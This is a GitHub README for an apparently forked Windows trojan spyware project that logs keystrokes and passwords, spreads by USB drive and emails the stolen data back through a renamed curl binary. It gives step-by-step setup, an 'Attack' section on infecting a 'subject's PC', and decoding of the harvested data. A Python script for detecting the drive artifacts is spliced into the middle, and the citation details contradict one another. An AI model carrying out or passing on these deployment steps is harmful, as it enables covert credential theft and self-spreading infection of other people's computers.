Sunil56224972/Trojan.Cockroach

GitHub: Sunil56224972/Trojan.Cockroach

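A Windows trojan spyware built for teaching purposes that systematically demonstrates core malware techniques such as keylogging, USB self-propagation, and data exfiltration.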

Stars: 4 | Forks: 1

Trojan Cockroach

#### A Stealthy Trojan Spyware

What you are looking at is a **Trojan virus** that steals data (IDs, passwords; every keystroke) from a PC (Windows XP and later) and then emails it to you. It spreads between PCs through USB drives and is almost undetectable by any antivirus.

*Created for learning purposes only.*

### Introduction

- [TrojanCockroach.cpp](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/TrojanCockroach.cpp) - logs the user's data, sends the data through Transmit.exe, and infects portable drives.
- [Infect.cpp](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/Infect.cpp) - installs the virus onto the computer from a portable drive.
- [Transmit.exe](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/Transmit.exe) - emails the data back.
- [TrojanCockroach.lnk](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/TrojanCockroach.lnk) - resides in the PC's startup folder and activates TrojanCockroach.exe.
- [Infect.lnk](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/Infect.lnk) - takes various attractive names on the infected portable drive and activates Infect.exe when clicked.
- [DecodeMessage.cpp](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/DecodeMessage.cpp) - used to decode the received email.

### Setup
  1. Preparation
    1. Download the full package from here.

    2. Change the sendData() method of TrojanCockroach.cpp: place your email and password in the command.

    3. Compile TrojanCockroach.cpp & Infect.cpp. Transmit.exe is actually the executable distribution of curl for Windows.

    4. Place TrojanCockroach.exe, Infect.exe, Transmit.exe, Infect.lnk & TrojanCockroach.lnk in the same folder.

    5. Now run TrojanCockroach.exe, then insert a pendrive (see the magic!). You will get a hidden folder and a link file in your pendrive. The hidden folder contains the full package, & the link file is actually a renamed form of Infect.lnk.

  2. Attack
    1. Insert the USB-Drive in the subject's PC (Yes, you have to start the spreading process from somewhere!). Run Infect.lnk and the spyware will be injected.

    2. The spyware will be activated after a reboot. Now (after a restart), every time any USB-Drive is inserted in the affected PC, the virus will copy itself onto it, and the cycle will start again.

  3. Data Collection
    1. You need to wait several days (depending on the number of power on/off of the PC), before getting any data.

    2. After getting the email, copy the full message to a text file.
      As the message has come through email, certain characters are converted. To resolve that --- --- ---.

    3. Now, run DecodeMessage.exe to decode the message as plain text.
      In this phase, you can look for specific patterns in the text, and thus get rid of most of the useless parts (such as mouse clicks, or the same key group pressed repeatedly, as happens during gaming).
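
A defender's check for the drive artifacts the setup steps above describe (a folder holding the full package, plus a root-level link file that is a renamed Infect.lnk), as an added example that is not part of the original README or the project's code. The names `scan_drive` and `demo`, the three-file threshold, and the placeholder file contents are assumptions made for illustration.

```python
import hashlib
import os
import stat
import tempfile

# File names the README lists as the package copied onto a drive.
PACKAGE = {"trojancockroach.exe", "infect.exe", "transmit.exe",
           "infect.lnk", "trojancockroach.lnk"}

def sha256(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def is_hidden(path):
    # Windows hidden attribute; reads as False on other platforms.
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    return bool(attrs & stat.FILE_ATTRIBUTE_HIDDEN)

def scan_drive(root):
    """Report package folders and root shortcuts cloned from Infect.lnk."""
    findings = []
    links = [e.path for e in os.scandir(root)
             if e.is_file() and e.name.lower().endswith(".lnk")]
    for d in (e for e in os.scandir(root) if e.is_dir()):
        files = {f.name.lower(): f.path for f in os.scandir(d.path) if f.is_file()}
        hits = sorted(PACKAGE.intersection(files))
        if len(hits) < 3:  # assumed threshold: one matching name is not enough
            continue
        findings.append({"type": "package_folder", "path": d.path,
                         "hidden": is_hidden(d.path), "files": hits})
        if "infect.lnk" in files:
            ref = sha256(files["infect.lnk"])
            findings += [{"type": "renamed_infect_lnk", "path": p}
                         for p in links if sha256(p) == ref]
    return findings

def demo():
    # Constructed sample: inert placeholder bytes, not real binaries.
    with tempfile.TemporaryDirectory() as drive:
        pkg = os.path.join(drive, "data")
        os.mkdir(pkg)
        for name in ("TrojanCockroach.exe", "Infect.exe", "Transmit.exe",
                     "Infect.lnk", "TrojanCockroach.lnk"):
            with open(os.path.join(pkg, name), "wb") as fh:
                fh.write(b"placeholder:" + name.encode())
        for name, body in (("report.lnk", b"placeholder:Infect.lnk"),
                           ("notes.lnk", b"unrelated shortcut")):
            with open(os.path.join(drive, name), "wb") as fh:
                fh.write(body)
        return [(f["type"], os.path.basename(f["path"])) for f in scan_drive(drive)]
```

Matching the root shortcut by content hash rather than by name is what catches the renamed link file; the `hidden` flag is only meaningful when the scan runs on Windows.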

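### More Information

You can read [TrojanCockroachStory](https://github.com/MinhasKamal/TrojanCockroach/blob/master/TrojanCockroachStory.md) for an overview of how the program works. Its predecessor project, **[StupidKeyLogger](https://github.com/MinhasKamal/StupidKeyLogger)**, will give you a clearer understanding of this project.

The project is fully functional. However, I do not want newbies to misuse my project. So I have **kept some simple secrets undisclosed**. There are also some **loopholes** deliberately left in this "README". I have also made some **meaningless modifications** in the code, so that no one can run it effectively without getting their own hands dirty. I believe ***real programmers*** can easily overcome these simple obstacles :)

**Note:** *I also take no responsibility for any bad act anyone does with this program.* But I believe real learners will benefit greatly from it.

### Citation

```
@misc{Minhas2015TrojanCockroach,
  author = {Sunil, Yogi},
  title = {Trojan Cockroach: A Stealthy Trojan Spyware},
  year = {2024},
  publisher = {GitHub},
  url = {https://github.com/Sunil56224972/Trojan.Cockroach}
}
```

### License

Trojan Cockroach is licensed under the MIT License.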